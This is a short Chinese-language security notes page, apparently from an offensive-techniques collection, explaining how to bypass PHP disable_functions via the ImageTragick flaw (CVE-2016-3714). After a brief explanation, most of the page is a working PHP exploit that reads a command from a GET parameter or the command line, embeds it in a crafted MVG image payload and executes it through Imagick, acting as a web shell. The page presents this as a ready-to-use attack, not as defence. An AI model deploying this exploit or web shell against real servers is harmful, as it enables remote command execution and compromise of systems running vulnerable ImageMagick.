menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 001-Disable function chevron_right 007-利用 ImageMagick 漏洞绕过(一).md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    007-利用 ImageMagick 漏洞绕过(一).md
    1017 B / 2021-07-17 00:01:40
        ## 利用 ImageMagick 漏洞绕过(一)
    
    **1.利用条件**
    
    Imagick = 5.4
    
    **2.基本原理**
    
    ImageTragick(CVE-2016-3714)
    漏洞的利用过程非常简单,只要将精心构造的图片上传至使用漏洞版本的ImageMagick,ImageMagick会自动对其格式进行转换,转换过程中就会执行攻击者插入在图片中的命令。因此很多具有头像上传、图片转换、图片编辑等具备图片上传功能的网站都可能会中招。
    
    **3.exp**
    
    ```php
    <?php
    echo "Disable Functions: " . ini_get('disable_functions') . "\n";
    
    $command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];
    if ($command == '') {
       $command = 'id';
    }
    
    $exploit = <<<EOF
    push graphic-context
    viewbox 0 0 640 480
    fill 'url(https://example.com/image.jpg"|$command")'
    pop graphic-context
    EOF;
    
    file_put_contents("KKKK.mvg", $exploit);
    $thumb = new Imagick();
    $thumb->readImage('KKKK.mvg');
    $thumb->writeImage('KKKK.png');
    $thumb->clear();
    $thumb->destroy();
    unlink("KKKK.mvg");
    unlink("KKKK.png");
    ?>
    
    ```
    
    
    
    links
    file_download